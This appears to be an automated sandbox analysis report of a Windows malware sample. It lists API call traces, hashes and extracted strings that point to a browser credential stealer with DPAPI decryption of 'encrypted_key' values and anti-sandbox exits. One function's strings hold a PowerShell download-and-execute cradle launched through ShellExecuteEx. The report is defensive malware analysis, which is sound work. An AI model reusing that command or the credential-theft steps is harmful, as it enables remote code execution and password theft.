                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                        • ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                        • LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                        • CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                        • Instruction ID: 461739f713f6582ed5ccc2497ea68013164b4033f14286a6be278cc584591a67
                                        • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                        • Instruction Fuzzy Hash: 5F311878A10209EFDF14DFD4C884BAE77F5FB49314F108159E916A7294C774AA81CFA1
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                        • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                        • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                        • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                        APIs
                                        • __getptd.LIBCMT ref: 022FCC51
                                          • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                          • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                                        • __amsg_exit.LIBCMT ref: 022FCC71
                                        • __lock.LIBCMT ref: 022FCC81
                                        • InterlockedDecrement.KERNEL32(?), ref: 022FCC9E
                                        • free.MSVCRT ref: 022FCCB1
                                        • InterlockedIncrement.KERNEL32(0042B980), ref: 022FCCC9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                        • String ID:
                                        • API String ID: 634100517-0
                                        • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                        • Instruction ID: c9908bb4c97afe907420c20ddd72da9d107a92ac76b33a86dbde7f127e4fa72a
                                        • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                        • Instruction Fuzzy Hash: AE01AD32A21B2AABC7A1EBE9944475DF760BF08714F404137EE14A72A8CB646481DFD9
                                        APIs
                                        • __getptd.LIBCMT ref: 0041C9EA
                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                        • __amsg_exit.LIBCMT ref: 0041CA0A
                                        • __lock.LIBCMT ref: 0041CA1A
                                        • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                        • free.MSVCRT ref: 0041CA4A
                                        • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                        • String ID:
                                        • API String ID: 634100517-0
                                        • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                        • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                                        • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                        • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                                        APIs
                                        • strlen.MSVCRT ref: 022F7186
                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022F7401,00000000,00420BA8,00000000,00000000), ref: 022F71B4
                                          • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E48
                                          • Part of subcall function 022F6E37: strlen.MSVCRT ref: 022F6E6C
                                        • VirtualQueryEx.KERNEL32(022F7574,00000000,?,0000001C), ref: 022F71F9
                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022F7401), ref: 022F731A
                                          • Part of subcall function 022F7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022F705F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                        • String ID: @
                                        • API String ID: 2950663791-2766056989
                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                        • Instruction ID: b4bd8eeb78bb4ede988fa66102ea3c19b05c5bbe284d5346f78080d630e382af
                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                        • Instruction Fuzzy Hash: A351F8B1D1010AEBDB44CFD8D981AEFF7B6BF88304F048529FA15A7244D774AA11CBA1
                                        APIs
                                        • strlen.MSVCRT ref: 00416F1F
                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                          • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                          • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strlen$MemoryProcessQueryReadVirtual
                                        • String ID: @
                                        • API String ID: 2950663791-2766056989
                                        • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                        • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                        • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                        • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                        APIs
                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: *n@$*n@
                                        • API String ID: 1029625771-193229609
                                        • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                        • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                        • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                        • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                        APIs
                                        • lstrcat.KERNEL32(?,0064A30C), ref: 022F4A42
                                          • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F4A68
                                        • lstrcat.KERNEL32(?,?), ref: 022F4A87
                                        • lstrcat.KERNEL32(?,?), ref: 022F4A9B
                                        • lstrcat.KERNEL32(?,0064A284), ref: 022F4AAE
                                        • lstrcat.KERNEL32(?,?), ref: 022F4AC2
                                        • lstrcat.KERNEL32(?,0064A2C8), ref: 022F4AD6
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022F8FF7: GetFileAttributesA.KERNEL32(00000000,?,022E1DBB,?,?,00425654,?,?,00420E1F), ref: 022F9006
                                          • Part of subcall function 022F47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                          • Part of subcall function 022F47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                          • Part of subcall function 022F47D7: wsprintfA.USER32 ref: 022F480D
                                          • Part of subcall function 022F47D7: FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                        • Instruction ID: 847f116a5f48ac333e99bcda6484a6307a634ab994cc7fd3dee504f637593392
                                        • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                        • Instruction Fuzzy Hash: C83193BA9503086BDB50FBF0CC84EEDB37AAB48700F4045D9B34596084DEB49789CF95
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                        • ')", xrefs: 00412CB3
                                        • <, xrefs: 00412D39
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: c9ab42bb10bafceb3a2126a53ee7fea74a6f06622b5eea89e5d1398bf33592cf
                                        • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                        • Opcode Fuzzy Hash: c9ab42bb10bafceb3a2126a53ee7fea74a6f06622b5eea89e5d1398bf33592cf
                                        • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                        • __aulldiv.LIBCMT ref: 022E14BF
                                        • __aulldiv.LIBCMT ref: 022E14CD
                                        • ExitProcess.KERNEL32 ref: 022E14FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                        • Instruction ID: 59a76208ba74fbd1e2a55642bedbe2d77768888a787a1a4f4721aeff0056f913
                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                        • Instruction Fuzzy Hash: F7016DB0960308BAEF10DBD0CC89B9DBBB9AF00705F608468E70A7B2C4D7B499418B55
                                        APIs
                                        • memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022F0CC7: memset.MSVCRT ref: 022F0E83
                                          • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0E9C
                                          • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022F0EAE
                                          • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00000000), ref: 022F0EC4
                                          • Part of subcall function 022F0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022F0ED6
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • memcmp.MSVCRT(?,00421114,00000003), ref: 022EA116
                                        • memset.MSVCRT ref: 022EA14F
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 022EA1A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                        • String ID: @
                                        • API String ID: 1977917189-2766056989
                                        • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                        • Instruction ID: 4d61889b6cc6cf9a28471d0d720ec13aac3e0ea3a00a72f8ef000fee25e76126
                                        • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                        • Instruction Fuzzy Hash: 66613F316203489BDF24EFE4CD96FDD7776AF44704F408128EA0A5B694DBB46A05CF51
                                        APIs
                                        • strtok_s.MSVCRT ref: 00410DB8
                                        • strtok_s.MSVCRT ref: 00410EFD
                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0085A0F8,?,0042110C,?,00000000), ref: 0041A82B
                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strtok_s$lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 348468850-0
                                        • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                        • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                        • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                        • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                        • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                          • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                          • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                          • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                          • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 3731072634-738592651
                                        • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                        • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                        • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                        • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CodeInfoPageValidmemset
                                        • String ID:
                                        • API String ID: 703783727-0
                                        • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                        • Instruction ID: 4a5e80101a10a497395bbe7b4346c7445c58e1068825383f797269a4bf34c7f1
                                        • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                        • Instruction Fuzzy Hash: 1C312B31A2429A9ED7A5CFB4C854279FFA09B05314B1942BBDA81CF199D768C405C751
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 022F6BD3
                                        • sscanf.NTDLL ref: 022F6C00
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C19
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C27
                                        • ExitProcess.KERNEL32 ref: 022F6C41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                        • Instruction ID: be7223b989078f18044266b5138ef5a6c30e201ba90e43929f2d1fe9ff28c260
                                        • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                        • Instruction Fuzzy Hash: 8921EBB5D14209AFCF48EFE4D9459EEB7BAFF48300F04852EE516A3254EB345604CB65
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F809E
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F80A5
                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022F80C5
                                        • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022F80E6
                                        • RegCloseKey.ADVAPI32(?), ref: 022F80F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                        • Instruction ID: a96c1d8170eca9f8ab5161e618ed699f30b4f09bbf2a98c685518c80326c3dd5
                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                        • Instruction Fuzzy Hash: 0A113DB5A94209BBD710CFD4DD4AFBBF7B9EB05710F104219F615A7290C7B558008BA2
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                        • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,0085D2C0,00000000,00020119,?), ref: 00417E5E
                                        • RegQueryValueExA.ADVAPI32(?,00860650,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
